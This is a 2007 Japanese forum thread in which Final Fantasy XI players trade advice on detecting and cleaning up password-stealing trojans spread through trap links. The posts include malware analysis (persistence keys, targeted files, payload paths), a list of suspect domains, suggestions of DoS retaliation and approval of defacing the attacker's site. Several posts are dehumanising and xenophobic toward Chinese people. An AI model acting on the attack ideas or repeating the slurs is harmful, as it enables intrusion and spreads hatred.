感染?とか思う人は
取り合えずブラウザとか閉じて
スタート -> すべてのプログラム -> アクセサリ ->コマンドプロンプト
C:\WINDOWS>
の横に netstat -a と入力
そうすると今の状態がずらずらっと。
その中の一番右側 Stateの部分がESTABLISHED ってでてるのがあれば
それが今接続されているアドレス。
そのアドレスが分からない所のなら
http://wannabe.fam.cx/service/link.cgi?http://www.mse.co.jp/ip_domain/ いっって調べればわかるはず
386 :既にその名前は使われています:2007/10/16(火) 12:33:28.77 ID:ZSPjFQ2k
仮に引っかかってもFFなんかで恥ずかしくて被害届だせないよなw
387 :既にその名前は使われています:2007/10/16(火) 12:34:36.18 ID:fuv7QfAB
上のはトロイの場合の検索方法ね。
388 :既にその名前は使われています:2007/10/16(火) 12:39:51.51 ID:yhgaGjN0
全部LISTENINGなら動いてるプロセスはないという解釈でいい?
389 :既にその名前は使われています:2007/10/16(火) 12:41:10.05 ID:aRHTNwgl
ブログに法輪孔や天安門みたいな向こうで検索かけたらしょっ引かれるような
キーワード置いておくとか、寧ろ向こうからのアクセスのみその手のサイトに自動的に飛ばすとか
そういうの意味無い?
390 :既にその名前は使われています:2007/10/16(火) 12:43:01.22 ID:3g2P8RZU
ESTABULISHERないんだけどどうすればいい?
391 :既にその名前は使われています:2007/10/16(火) 12:48:14.29 ID:7lOzvimz
>>386
別に恥ずかしくないけどな
392 :既にその名前は使われています:2007/10/16(火) 12:52:34.31 ID:fuv7QfAB
ESTABLISHEDがないなら取り合えず勝手に接続してるのは
ないと思っていいかな。大抵スタートアップに組み込まれたりして
常時送り続けるからトロイにかかってればES〜ってだされてるはず
netstat -an のがわかりやすいかも?
393 :既にその名前は使われています:2007/10/16(火) 12:57:15.90 ID:yhgaGjN0
-anのほうが分かりやすいね
394 :既にその名前は使われています:2007/10/16(火) 13:20:11.87 ID:Uor/OgYr
こうなったら「天安門」「自治」「台湾独立」とかで
対抗するしかないのか
FFブログの人はみんな天安門とか書いとけば
中華本国からの接続はしてこないだろうな
問題は、日本国内に潜伏してる中華人が
書き込みしてるってとこなんだが・・・
395 :既にその名前は使われています:2007/10/16(火) 13:23:53.12 ID:gvsM/B5G
クソエニは大惨事にならんとわからないらしいな
さっさとゲーム内でも告知しろよw
396 :既にその名前は使われています:2007/10/16(火) 13:34:46.75 ID:D4aUEWzJ
ファイヤーウォール入れとけば良いジャマイカ
397 :既にその名前は使われています:2007/10/16(火) 13:36:17.66 ID:yhgaGjN0
>>394
あくまでもインターネットの治安維持の線で攻めた方が良いと思う
中国人だけとは限らない。何人とは言わないが。
398 :既にその名前は使われています:2007/10/16(火) 13:38:32.89 ID:mMDTO5JL
キムタク「俺のファイファンキャラが中国人にハッキングされて消されたんですよ;;■eは何の保障もしてくれず、、、」
こんな展開キボンヌw
399 :既にその名前は使われています:2007/10/16(火) 13:41:39.60 ID:GC85tEC3
応答するポートを利用しているアプリケーションを表示してくれるツール (一応定番で有名どころ)
Fport:ttp://www.foundstone.com/us/resources/proddesc/fport.htm
※ コマンドラインツールなので、ダブルクリックしてウィンドウが一瞬で閉じたからといってびっくりしないようにw
(GUIベースの別のツールもあったけど忘れた(^-^;
400 :既にその名前は使われています:2007/10/16(火) 13:42:07.11 ID:fMmtES/S
いまどきキムタクてwwwww
401 :既にその名前は使われています:2007/10/16(火) 13:44:00.42 ID:JQLMBzWC
>>386
不正アクセスに関する限り、プレイヤーは被害者になれないから大丈夫だ
402 :既にその名前は使われています:2007/10/16(火) 13:46:29.47 ID:sMhtQxHn
キムタクが被害にあったらマスコミやジャニーズが黙ってないだろ
403 :既にその名前は使われています:2007/10/16(火) 13:49:56.65 ID:YdTlPzm+
じっさい被害にあった奴いるの?
404 :既にその名前は使われています:2007/10/16(火) 13:58:36.29 ID:UbZsJp7G
dos攻撃で反撃できないもんかね
405 :既にその名前は使われています:2007/10/16(火) 14:08:27.17 ID:O2qKzj6+
しかし、中国ってどこまでも終わってるよなぁ
FFで必死に活動する業者や、ニュースなどで中国のパクリモノ見たりすると、
ほんと日本に生まれて良かったと思う。
406 :既にその名前は使われています:2007/10/16(火) 14:10:18.26 ID:g977yZmM
俺も日本人でよかったと思う
407 :既にその名前は使われています:2007/10/16(火) 14:13:32.02 ID:zu1PJ9rz
>>394
「天安門」「自治」「台湾独立」とか書いとく場所はどこら辺がいいんだ
htmlの<title>あたりに書いとけばシナ共産党が接続遮断してくれるのか?w
接続を強制遮断する共産党にとってのNGワードリストなどあると助かるな
408 :既にその名前は使われています:2007/10/16(火) 14:15:30.73 ID:2VZnE/L3
以前にこんな罠サイト騒ぎがあったときは神が降臨して中華のHP書き換えまくってたな
中華が復旧したあとすぐに「そうはいかんざき」の写真に書き換えてたのはワロタ
409 :既にその名前は使われています:2007/10/16(火) 14:46:35.74 ID:cHZ+9+L6
あまり詳しくないのでもし分かる人がいたら教えてほしいです。
>>385 にあるチェックをしてみて
ESTABLISHED の箇所が自分のIPじゃなかったので検索したら
% [whois.apnic.net node-1] って出て、apnic.net のURLも記載されてかたら
上に紹介されてた aguse.net で調べてみたら中国だった
コメ欄からアドレス踏んだ覚えないし、FF系のwikiも見てないんだけど
やっぱりこれ感染してるんだろうか orz
さっきウィルスバスターでスキャンしたら出なかったんだけどな…
410 :既にその名前は使われています:2007/10/16(火) 14:56:48.83 ID:qKbbKty6
>>407
表示では規制されないんじゃなかったか
それで良いならFF11で「天安門事件凄惨」とか適当なシャウトで
奴ら業者はしょっ引かれて消えるハズ
パスワードを任意の日本語+数字可能にしてもらい「天安門事件反対123456」みたいなので
入力時に公安に逮捕させる くらいか
411 :既にその名前は使われています:2007/10/16(火) 15:02:31.26 ID:ur0bgfcq
報復といったらこの事実を広める事くらいか
といっても「FFのパスが〜」なんて言っても相手にされないから「個人のブログにウイルス感染するアドレスを書き込んでいる集団がいる」というのと「そいつらは中国人だった」という事実を広めてみてはどうだろうか?
412 :空気コテ ◆AIR..o0rvE :2007/10/16(火) 15:13:24.74 ID:l6Djc+Ck
最近の罠サイト誘導のカキコは、国内のふつーのプロバイダからなので、
天安門とか書いても意味ない感じ。
ODNとかおおいです。
413 :既にその名前は使われています:2007/10/16(火) 15:16:38.53 ID:1JkHR226
>>412
それ書き込みスクリプト埋め込まれた
一般人が吐き出してるんじゃないかな?
414 :既にその名前は使われています:2007/10/16(火) 15:19:55.38 ID:7Oi8L5nd
素人なのですが、
>>385にあるチェックを試してみたら変なアドレスが引っかかりました。
http://wannabe.fam.cx/service/link.cgi?http://whois.ansi.co.jp/?key=127.0.0.1
http://wannabe.fam.cx/service/link.cgi?http://whois.ansi.co.jp/?key=192.168.0.2
アメリカの会社みたいなのですがそんな所に接続した事無いしとても不安です。
詳しい方、いらっしゃいましたら教えてください。
415 :空気コテ ◆AIR..o0rvE :2007/10/16(火) 15:20:42.98 ID:l6Djc+Ck
>>413
その可能性もありますね。
あと、open串では無かったです。
416 :既にその名前は使われています:2007/10/16(火) 15:22:03.16 ID:KAievkKe
>>410
ブログの確認キーを台湾独立とかにすればいいのかww
つうか、ああいう確認キーって任意に設定できたかな・・・
417 :空気コテ ◆AIR..o0rvE :2007/10/16(火) 15:22:12.46 ID:l6Djc+Ck
>>414は凄腕の釣士
418 :既にその名前は使われています:2007/10/16(火) 15:30:38.21 ID:KAievkKe
つうか、FFのログインパスをピンインで天安門とかを含む文字列にすればいいんじゃね?
含むだけでそれそのものじゃなければ、他の部分の推測は出来ないだろうし、
心配なら16桁ぐらいのパスワードにすればよくね?
419 :既にその名前は使われています:2007/10/16(火) 15:34:01.26 ID:F7hPVB4T
>>414
釣りだよな……?
127.0.0.1 自分自身
10.0.0.0〜10.255.255.255 ローカル・クラスA
172.16.0.0〜172.31.255.255 ローカル・クラスB
192.168.0.0〜192.168.255.255 ローカル・クラスC
市販ルータはデフォルトでローカル・クラスCのどこか使っているのが多いよね。
420 :既にその名前は使われています:2007/10/16(火) 15:34:11.60 ID:fNQZG82q
>>408
2年前のちょうど今頃だっけ
懐かしいなw
421 :既にその名前は使われています:2007/10/16(火) 15:37:13.05 ID:aHjCVq+6
FF専用マシンにして、ブラウザ開かないってことになると、
もはやPCである必要なくなるな。
X箱買ったほうがいいような気がする。
422 :既にその名前は使われています:2007/10/16(火) 15:46:19.43 ID:KAievkKe
>>421
箱はA、Bボタンの位置がな・・・
423 :既にその名前は使われています:2007/10/16(火) 15:46:23.59 ID:fNQZG82q
オレも見てたがその時のネ実住民の動き
5分で読める、まとまっていないまとめ
「花と雫FF11情報局」、Overtureの審査を通過し広告が出る。
稼動、トロイ埋め込み、広告掲載の日時は不明。7月頃と推測されている。
(それなりの月日が経過)
10/21(金)
1 20:56 1氏、スレ立て。AntiVirで検知。住民は宣伝かと疑う。
17 21:20 17氏、Avast!で検知。住民はまだ半信半疑。
24 21:30 1氏、AntiVirとAvast!で検知するとまとめる。以降テンプレ化。
32 22:41 1氏、中華業者によるトロイとの推測を提示。
ノートンやバスターで反応なしと書いた数名が犠牲に。
39 22:59 39氏、svchostを解析し、トロイと断定。
10/22(土)
74 00:56 74氏、スクエニに通報。
114 02:54 74氏、まとめる。
-117
139 04:39 74氏にスクエニから定型メール返信。
424 :既にその名前は使われています:2007/10/16(火) 15:47:04.17 ID:fNQZG82q
184 12:15 1氏、まとめる。
-189
--- 12:31 肉氏のblog「ばなな.com」に載る。情報が2chの外に広がることに。
276 15:07 276氏、WindowsXPSP2で踏み、デジタル署名で笑う。
316 18:26 316氏、ハカーを中国人IcyFoxと推測。
-319
10/23(日)
436 03:26 436氏、踏む。素人とのことで悪戦苦闘する。
445 04:49 39氏、再度まとめる。
-449
--- 10:35 肉氏、プレミアサイト「FF11Gameinside」のフォーラムに投稿する。
519 11:57 436氏、よん? 猫モでもわかるようにまとめる。
531 12:21 リネージュでは以前から同様のトロイが多数あったことが判明してくる。
-578
580 14:16 580氏、初心者向けにまとめる。
-581
425 :既にその名前は使われています:2007/10/16(火) 15:47:35.55 ID:fNQZG82q
693 19:09 660氏、サイトを赤い画面に書き換える。ファイルも消される。
797 21:08 797氏、広告費のためのうっかりクリックを提案。みんなうっかりする。
806 21:17 サイトの赤い画面に日本語の解説が載る。
876 22:33 876氏、ニュース速報にスレ立て。
10/24(月)
927 00:07 サイトが白い画面「ぽこたんインしたお!」に書き換わる。
1 02:24 スレ立て。
7 02:16 7氏、まとめる。
-18
22 02:36 22氏、まとめる。
426 :既にその名前は使われています:2007/10/16(火) 15:48:04.77 ID:fNQZG82q
--- 09:00? サイトが復活する。
--- 10:00? サイトが再度「あ、ぽこたんインしたお!」に書き換わる。
--- 11:00? サイト消される。。
304 16:00 304氏、トロイを逆アセンブルして詳細に解析。
311 16:25 サイトが復活する。
357 17:00 357氏、トロイが新バージョンであることを突き止める。
366 17:12 サイトが「そうはいかんざき!」に書き換わる。
375 17:21 サイト消される。
401 17:52 中華(IcyFox?)が話し合いの申し入れ。ファイル「japan hack read.txt」
hellow i will talk with you wlmx009@hotmail.com
403 17:55 話し合い拒否? 中華がキれる。ファイル「fcuk you japan.txt」
hellow i will talk with you wlmx009@hotmail.com
yes or no??? your msn??
448 18:24 サイトが無害化し復活。以下丸1日無害(Overtureの審査待ち?)。
427 :既にその名前は使われています:2007/10/16(火) 15:48:48.96 ID:fNQZG82q
10/25(火)
840 17:26 サイトにトロイが仕込まれる。
849 17:43 849氏、トロイが新バージョンであることを突き止める。
859 18:47 859氏、ファイアウォールでの遮断ホストをまとめる。
882 19:22 バスターが対応。
935 22:20 ノートンも対応。
955 22:58 955氏、各社対応をまとめる。
428 :既にその名前は使われています:2007/10/16(火) 15:49:20.05 ID:CzgANJHf
>401 17:52 中華(IcyFox?)が話し合いの申し入れ。ファイル「japan hack read.txt」
> hellow i will talk with you wlmx009@hotmail.com
>403 17:55 話し合い拒否? 中華がキれる。ファイル「fcuk you japan.txt」
ワロタwwww
429 :既にその名前は使われています:2007/10/16(火) 15:49:29.79 ID:fNQZG82q
124 名前:既にその名前は使われています投稿日:2005/10/26(水) 19:12:22 ID:kV+oZrGE
今回のカラクリをおさらい
RMT業者
↑アカウント売買
中華の罠サイト → 個人情報売買 → 中華マ○ィア
↓個人情報売買 ↓金持ちの情報
日本の闇組織 ⇔ 誘拐組織
闇取引
■e ('A`)?
430 :既にその名前は使われています:2007/10/16(火) 16:15:01.27 ID:GC85tEC3
>>371
かなり遅レススマソ
とりあえず、そこは 2006/04 にパッチが出た脆弱性を利用しているので
Windows Up Date してあれば感染しないと思われ( Ms06014.htm と同種 )
"C:\WINDOWS\SYSTEM32\" に "SVCH0ST.EXE" もしくは "SVCHOST.VBS"
が
存在する場合は感染を疑ったほうがいいかも
(SVCH0ST.EXE は "O(オー)" でなく "0(ゼロ)" なので注意。"O(オー)"は、はじめから存在する)
MS06-014:ttp://www.microsoft.com/japan/technet/security/Bulletin/MS06-014.mspx
<詳細>
sanffm_htm の中身は Vbscript で書かれたソースを " or 0x80" で難読化させてる
US-ASCII なのはそのため ("and 0x7f" で綺麗なソースになるよ)
Vbscript を読むと、MS06-014 (2006/04) の脆弱性をついて www_6828teacup_com/sanf11_exe を
%SYSTEMROOT%\SYSTEM32\SVCH0ST.EXE と SVCHOST.VBS で保存しようとしているぽい
※ このまま全部を信じないでください。詳しい方添削おながいします。
>>空気コテ、ソースサンクス
431 :既にその名前は使われています:2007/10/16(火) 16:17:15.63 ID:wduCnpq6
まとめサイト作ってくれる神はいないのだろうか
(wikiだと改竄されるからホームページで)
432 :既にその名前は使われています:2007/10/16(火) 16:31:49.07 ID:KAievkKe
やばそうなサイトリスト
tp://www■blogplaync■com/
tp://www■xiaoriben■net/
tp://mbspro6uic■com/
tp://tinyurl■com/
tp://www■sakerver■com/
tp://www■k5dionne■com/
tp://www■teamerblog■com/
tp://www■articlelin■com/
tp://www■panslog■net/
tp://www■wikifdjary■net/
tp://www■euphidime■com
tp://www■angelfire.com■/
tp://ff11link■blog122■fc2■com
433 :既にその名前は使われています:2007/10/16(火) 16:53:20.51 ID:fuv7QfAB
>>409
再起動して常駐とか外してもそこ繋げてる?
434 :既にその名前は使われています:2007/10/16(火) 16:59:16.99 ID:1JkHR226
>>432のアドをNGに叩き込むとかできないのかな?
435 :既にその名前は使われています:2007/10/16(火) 17:08:27.77 ID:4DvfQKCa
>>434
FireWall系のソフトを使うか>>373の方法でローカルに向けちゃえば
実質アクセスされなくなる
まぁhostsだと検知できないがな
436 :既にその名前は使われています:2007/10/16(火) 17:11:22.24 ID:GC85tEC3
>>434
例えばIEの場合
[ツール]→[インターネットオプション]→[セキュリティ]→[制限付サイト]→[サイト]
で各サイトを登録すると、リストに追加されたサイトのみに適用させるセキュリティ設定がカスタマイズできるよ
(デフォルトで、Javascript、ActiveX等の全ての動作を禁止している)
IEに新たな脆弱性が0dayとかで出たら対応できない可能性もあるけど、
設定すれば安全性はかなり高まる
437 :既にその名前は使われています:2007/10/16(火) 17:24:56.46 ID:3g2P8RZU
>>392
遅レスながら、ありがとにゃん
438 :既にその名前は使われています:2007/10/16(火) 17:25:18.76 ID:KckLGoqC
中国の検閲システム金盾は、あらゆる中国用検索エンジンで
タブーワードが検索結果に載らないというだけで
海外の検索エンジンを経由すれば普通に載る。
だから自分のサイトにタブーワード埋め込むとか無意味。
439 :既にその名前は使われています:2007/10/16(火) 17:37:23.98 ID:TBFr8om6
>>438
タブーワード発信に関してはどうなの?
タブーワードを忘れ発信しなければアクセス出来ない場合、奴らはどういう行動に出ると予測される?
440 :既にその名前は使われています:2007/10/16(火) 17:39:10.05 ID:UbZsJp7G
牛や豚を人間の都合で殺しても許されるんだから
牛豚を同じ家畜である中国人に置き換えても、成立するはずなのだが。
441 :既にその名前は使われています:2007/10/16(火) 17:50:28.97 ID:bfPe6BNS
>>279
亀だがそれどうやって設定すんだ?
442 :既にその名前は使われています:2007/10/16(火) 17:51:29.41 ID:cWYi7sAN
例えばさ、POLのIDをシナ語で「台湾独立万歳」、
パスワードを「打倒中国共産党」とか「中国共産党幹部汚職」とかしたら
あいつら送信できるもんか?
443 :既にその名前は使われています:2007/10/16(火) 18:09:07.33 ID:H+JYkYw8
とりあえず>>432のURLをうちのブログの禁止ワードに全部ぶっこんだ。
どんどんぶっこむぜー
444 :既にその名前は使われています:2007/10/16(火) 18:16:11.02 ID:gi39A9Yk
>>385
ESTABLISHEDが2つあって自分と自分を繋いでる・・・
これは何だろう・・・?
445 :既にその名前は使われています:2007/10/16(火) 18:19:00.08 ID:gi39A9Yk
>>443
>>359のリネージュ資料室にあるのを全部ぶち込んでみたらどうだろう?
446 :既にその名前は使われています:2007/10/16(火) 18:20:03.00 ID:AdRLUbdG
フジでメイドインチャイナwwww
447 :既にその名前は使われています:2007/10/16(火) 18:32:54.18 ID:jK91TK3A
携帯でF5アタックだな
448 :既にその名前は使われています:2007/10/16(火) 18:56:11.19 ID:8zyeJfQG
・PS2やXBOX360で遊ぶび、FFをプレイするPCでネットサーフィンしない
・漫画喫茶やインターネットカフェなど他人のPCやゲーム機でのログインはしない、他人にパスは教えない
・IDやパスをPC内に残さない(キーの入力情報まで読まれることがあります)
・もしするのであれば最新のウィルス駆除ソフト、スパイウェア駆除ソフトを入れてログインの前に必ずそれらを走らせる
(無料のツールならSpybot、Ad-aware、Windows Defender、avast! Antivirus、AVG等があります)
・ウィンドウズアップデートを自動更新にし、常に最新の状態を保つ
・IE(インターネットエクスプローラー)は可能な限り使用しない(Sleipnir、Firefoxなどがあります)
・その他はIEではないタブブラウザ(Sleipnir、Firefox)を強く推奨、2chを見るなら専用ブラウザ(JaneStyle非IEコンポネ)で見る
・2ch等の掲示板や個人Blogにはられたリンクを気軽に踏まない
・JAVAアプレットはオフ、アクティブXはDL通知or拒否にしておく。
・万が一パス抜きをされた場合は運営に報告、サイバーネット課や生活安全課に相談
・個人的な対処としては対象PCの回線を切り、安全なPCやPS2などでパスを変更した後対象PCのクリーンインストールをし直す
**参考サイト**
リネージュ資料室、セキュリティ対策(基本的な知識や対策)
http://wannabe.fam.cx/service/link.cgi?http://lineage.nyx.bne.jp/misc/security/
ブラウザの設定
http://wannabe.fam.cx/service/link.cgi?http://www.affrc.go.jp/ja/info/kenshu/INTRO/2_browser_1.html
■aguse.net (怪しいURLを見つけたらこれでチェック)
http://wannabe.fam.cx/service/link.cgi?http://www.aguse.net/
>>267のROのページは個人のものなのでとりあえず外してみました
449 :既にその名前は使われています:2007/10/16(火) 18:58:41.18 ID:8zyeJfQG
知識の無い>>28ですが簡単に纏めてみました
参考サイトのURLと文章は別にしたほうが良いと思われます
450 :既にその名前は使われています:2007/10/16(火) 19:06:00.52 ID:8zyeJfQG
一行目が遊ぶびになってる('A`)
451 :既にその名前は使われています:2007/10/16(火) 19:08:35.85 ID:P4r7otkH
専ブラはJane Doe Styleを使ってるけど、これって非IEコンポーネントなんですか?
もし設定でそう変更できるならその方法を教えてもらえませんか。ざっと設定を
みたんですが、どこで変更するのかがよくわからないのです。
452 :既にその名前は使われています:2007/10/16(火) 19:14:14.91 ID:ipMxB3zO
メモ帳から 手打ちで作ったhtml
内容 ソースはぐだぐだ。
ttp://tora.nomaki.jp/
トップディレクトリにzipもいれてるから
こんなでよければ もってって好きに使って
453 :既にその名前は使われています:2007/10/16(火) 19:16:49.78 ID:BEe0FeaJ
RO関係のまとめサイト。
下はジョブwikiだけど「安全の為に」の項目が充実してる。
ROアカウントハック対策スレのまとめサイト
ttp://sky.geocities.jp/vs_ro_hack/
BS-template
ttp://smith.rowiki.jp/
454 :既にその名前は使われています:2007/10/16(火) 19:17:56.82 ID:cHZ+9+L6
>>433
>>409です。常駐を全てはずして netstat -an でまた見ても
409に書いたのと同じ状態でした。
ただ>>414を見て気になったのが、ESTABLISHED の行に書かれてるアドレスが 127.0.0.1 でした。
通常「あなたのIPアドレス」として提示される数字と違うので
この127.0.0.1をIP検索にかけたら % [whois.apnic.net node-1] と結果が出て、
apnic.net を調べたら中国だったので不安になったわけです。
ググってみたら127.0.0.1はローカルホストの事だと書いてあり
何だか余計に分からなくなってきてます。
尚、ESTABLISHED はこんな感じで2行ありました
127.0.0.1:△△ 127.0.0.1:○○ ESTABLISHED
127.0.0.1:○○ 127.0.0.1:△△ ESTABLISHED
素人まるだしの教えてくんですみません。スレチだったら他にいきます。
455 :既にその名前は使われています:2007/10/16(火) 19:22:11.09 ID:VfEIvFw9
>>454
そのネタはもういい
456 :既にその名前は使われています:2007/10/16(火) 19:25:26.76 ID:cHZ+9+L6
ごめんなさい
他のスレを探してみます
457 :既にその名前は使われています:2007/10/16(火) 19:26:38.71 ID:LEj/PaN1
>>454
127.0.0.1:1025 という表示ではないだろうか
http://wannabe.fam.cx/service/link.cgi?http://itpro.nikkeibp.co.jp/article/NEWS/20051217/226406/
>ワームに感染するとパスワードなどを盗まれる恐れがある。
458 :既にその名前は使われています:2007/10/16(火) 19:38:27.04 ID:KckLGoqC
>>442
送信は出来る。ただし検閲が入っているから
それ以降自分の活動が中国当局にマークされる可能性はある。
459 :既にその名前は使われています:2007/10/16(火) 20:06:42.81 ID:a9ULkNvd
以前から言われているけどFFXIAHから飛べるRMTサイトもかなり危険だから注意
うっかりクリックしてる人結構多いんじゃないかな
460 :既にその名前は使われています:2007/10/16(火) 20:41:33.98 ID:czM5847H
>>453が怖くて見れない><
461 :既にその名前は使われています:2007/10/16(火) 20:46:01.96 ID:NuP6ZCoJ
最新のノートンでウイルス0だったら大丈夫なのかな?
踏んだけど即回線引っこ抜きチェック走らせた
踏んだ直後と昨日寝る前に二度
あと今朝一度
パスは知人のPCで変えたし、知人のPCでインしたところ侵入はまだされていないみたい
PCこれしかないのに恐くてインできない…
神兵がでなければこれを契機にやめちゃうんだけどな
462 :既にその名前は使われています:2007/10/16(火) 20:59:28.85 ID:5DTfD3A6
>>461
不安ならこれがすべてだって。
対象PCの回線を切り、安全なPCやPS2などでパスを変更した後対象PCのクリーンインストールをし直す。
面倒だしその日はそのPC使えないかもしれないけど、クリーンインストールしとくべき。
たったそれだけの事を怠って、抜かれたらアホらしいでしょ。
463 :既にその名前は使われています:2007/10/16(火) 21:07:39.83 ID:fuv7QfAB
>>454
TCP 0.0.0.0:△△ 0.0.0.0:0 LISTENING
TCP 0.0.0.0:○○ 0.0.0.0:0 LISTENING
こんなの上にでてるでしょ。
特に問題のないことだから気にしないでいいとおもう
464 :既にその名前は使われています:2007/10/16(火) 22:14:15.45 ID:gi39A9Yk
IEのセキュリティレベルを高にしてwiki見たら画面真っ白で焦ったwww
まあ、xmlで書かれているし何も表示されなくなって当然か・・・
465 :既にその名前は使われています:2007/10/16(火) 22:25:03.67 ID:NuP6ZCoJ
>>461
ありがとうございます
家に帰ったら早速クリーンインストールしてみます
466 :既にその名前は使われています:2007/10/16(火) 22:35:12.59 ID:hJRBS4Zx
>>394
国内は不正アクセスで牢屋に突っ込めます
踏み台にされたら知らんがw
467 :既にその名前は使われています:2007/10/16(火) 23:01:02.89 ID:gi39A9Yk
>>466
奴らは強制送還されれば死刑ほぼ確定らしいな
468 :既にその名前は使われています:2007/10/17(水) 00:03:29.28 ID:cWYi7sAN
>>458
じゃまるっきり無駄ってわけでもないのな
469 :既にその名前は使われています:2007/10/17(水) 00:07:27.89 ID:Uor/OgYr
外貨獲得の手段として推奨されそうですね^^;
470 :既にその名前は使われています:2007/10/17(水) 00:24:02.84 ID:zhMHKG2x
ミクシィでちょろっとFF11の事書くだけで
意味不明なコメント残して行ったやつがいた
こんなかんじ
「あの時のタフさはさすがナイトってかんじでしたね
そんな僕は冥王のピアスを2個かってご満悦です
http://ほにゃららほにゃらら 」
ってやつ
たぶん噂のパス抜きサイトかと思ったんで速攻削除した FF11フレもいるし・・・
他に書かれた人いる? 書いてきたやつなんか一般人っぽいんだが
471 :既にその名前は使われています:2007/10/17(水) 00:30:14.19 ID:lNqnEB4L
一般サイト管理者の名前を使って
一般サイトの文をコピペして罠を貼っていく奴がいる。
うちに来たのは中国からの接続だった。
472 :既にその名前は使われています:2007/10/17(水) 00:30:59.39 ID:s/kKytjd
コミュ『ウィンダス連邦』と『ソロな人』に新トピで怪しげなリンクがあるんだが…
473 :既にその名前は使われています:2007/10/17(水) 00:32:58.89 ID:MmFyiKAu
ゲーム内ではSTTの対策が強化されてきたからSTTの対策が及ばない外部から攻めてきたか。
金への執着心は一番だなチャイニーズ…
474 :472:2007/10/17(水) 00:44:29.64 ID:s/kKytjd
うはwwwもうミクシー退会してやがるwww
やっぱパス抜きサイトへのリンクだったか。
475 :既にその名前は使われています:2007/10/17(水) 00:45:33.51 ID:zhMHKG2x
>>472
一応警告文をどちらにも書いておいた
ちなみに聞きたいけど名前どんなやつだった?
俺に書いてきたやつももう消してた なんか名前にMとかはいってたと思う
476 :472:2007/10/17(水) 00:50:59.49 ID:s/kKytjd
『エヌP』だったかな…
うる覚えだから確かじゃないかも…
477 :475:2007/10/17(水) 00:53:15.23 ID:zhMHKG2x
>>472
あ、たぶんそれだwwww アルファベットはいってたなー てしか覚えて無かったw
ちなみにそのエヌPってやつ 普通に学生っぽかった
日記も全体公開で少なくともここ2週間分ぐらいはまともなのかいてあった
マイミクも20人ぐらい普通にいた
一体なんだったのかよくわからん 誰かに雇われてたのか?
478 :既にその名前は使われています:2007/10/17(水) 01:00:02.32 ID:t/0S/SVq
http://wannabe.fam.cx/service/link.cgi?http://www.gpara.com/kaigainews/korea/2007101603.php
日本どころか、会社を組織して韓国の会社に脅迫をかけはじめたシナ畜クオリティw
>>477
どっかで罠サイトを踏んで、本人がmixiのPASSも抜かれてる事に気付かずに不正
アクセスされている可能性大。つか、今ブログとmixiで全体公開しているFF関連
の個人日記やコミュにもBOTで書き込んでいるようなので注意したほうがいい。
ちなみに奴らの活動時間は深夜2時前後みたいだから、その時間帯で不審なURLの
書き込みを見つけたら速攻削除しておいたほうがいいよ。
479 :既にその名前は使われています:2007/10/17(水) 01:00:16.93 ID:nbNUn618
見クシィの管理人に通告して辿ってもらうとかなんとかならんのかね?
480 :472:2007/10/17(水) 01:05:30.10 ID:s/kKytjd
留学生なんかな…
ミクシーはウイルスとかに疎い人が多いから各コミュの管理人さんにメッセしてコミュの説明ページに『パス抜きサイトへのリンクがトピや※にあるから不用意にリンクを踏まないで下さい』って注意喚起して貰うとよいかも。
481 :既にその名前は使われています:2007/10/17(水) 01:07:26.79 ID:nbNUn618
留学生を雇って中継基地にするくらいだし、ミクシィもってる留学生を雇ったor報酬払って招待してもらった可能性はあるだろうな
482 :既にその名前は使われています:2007/10/17(水) 01:10:00.12 ID:QlBJPGz6
ぺってんにも罠サイト張られたって管理人が警告してるね
グレーな商売で満足してりゃいいものを
下手したら国際的に裁かれるぜ
483 :472:2007/10/17(水) 01:12:59.62 ID:s/kKytjd
地道にFF関連コミュの管理人さんにメッセージを送るしかないね。
それにしてもパス抜きされて苦労して金策して買ったアイテムが取られたら少々のショックじゃないだろうな。
484 :既にその名前は使われています:2007/10/17(水) 01:31:51.05 ID:RFn/OCI3
ミクシーに関しては知ったこっちゃないw
485 :既にその名前は使われています:2007/10/17(水) 01:45:13.41 ID:TZnTtD31
mixiは運営もアテにならないしな
486 :既にその名前は使われています:2007/10/17(水) 01:46:19.31 ID:THv6+eex
オレのmixi日記にもモロにその業者がコメント残してた。
もちろんmixi側にも通報したぜ。
487 :既にその名前は使われています:2007/10/17(水) 02:14:35.64 ID:eUQyp+PG
アホな質問なのかもしれんけど
田代砲とかでこっちからなんとかすることはできないの?
488 :既にその名前は使われています:2007/10/17(水) 02:18:40.28 ID:eUQyp+PG
あと■e側の対策として
(希望者のみ)指定したIP以外からの接続をできない設定にする
とかいうのは技術的に可能なの?
489 :既にその名前は使われています:2007/10/17(水) 02:21:47.69 ID:kZ4zj/vZ
■eはまたNHKとかに取り上げられてから動くんかな
490 :既にその名前は使われています:2007/10/17(水) 02:32:11.90 ID:bnoubli5
おkwネ実はやっぱり見る価値あるわ〜。
みんなエロイね。
491 :既にその名前は使われています:2007/10/17(水) 02:41:30.63 ID:fuUUsTZv
あげ
492 :既にその名前は使われています:2007/10/17(水) 02:41:53.11 ID:w2kmd88T
某SS掲示板にそれらしいのがあったけどそうかな?
jpgみたいなんだが
493 :既にその名前は使われています:2007/10/17(水) 03:23:48.60 ID:DgGSE2oO
ffzotsuとかいうjpgなら罠の一つだね
494 :既にその名前は使われています:2007/10/17(水) 03:58:12.67 ID:w2kmd88T
soreda!
jpgも油断できないのか(;´Д`)
495 :既にその名前は使われています:2007/10/17(水) 05:07:24.66 ID:bpzF6Nvu
ここ最近で身近な人が3人ほど身ぐるみ剥がされる被害にあってるな、全体でみたらすごい被害件数
になってると容易に予想できるね、自己責任とはいえ救済方法をもっと手厚くしてほしいよ
496 :既にその名前は使われています:2007/10/17(水) 06:30:18.06 ID:yGyY8X/m
289 名前:既にその名前は使われています[] 投稿日:2007/10/16(火) 18:07:13.99 ID:7/4KKOtC
mnk4.exeというのをのぞいた(今日現在、NIS2008では検出できない)。
自分自身を C:\WINDOWS\system32\explorerf.exe にコピーして、
これを、HKLM\Software\Microsoft\Windows\CurrentVersion\Run に
登録し、Windowsの起動時に常駐させる。
ざっと文字列をさらったら、こんなのが出てきた。
usr\all\login_w.bin ←POLのパスワード格納ファイルだったかな
passmem: 、binfile 、bindata1 、bindata2 、?passmem= 、
&binfile= 、&bindata= 、&firstbin=yes 、&firstbin=no ←この辺は2年前にも見た気がする
C:\temp.bin 、c:\ff12.txt 、c:\ff13.txt
66ff33mapfile 、c:\66ff33.txt
pol.exe ←やっぱりPOL
jpff11.dll ←謎
StartHook 、StopHook ←プロセスをフックしてデータ読むんかね
http://wannabe.fam.cx/service/link.cgi?http://ff11ma.****.net/888.txt ←503だった
cery.exe、love1.exe、sanf11.exe、server.exe、sfdg.exe、test.exe、SEX
MOVIES.exeなんかは
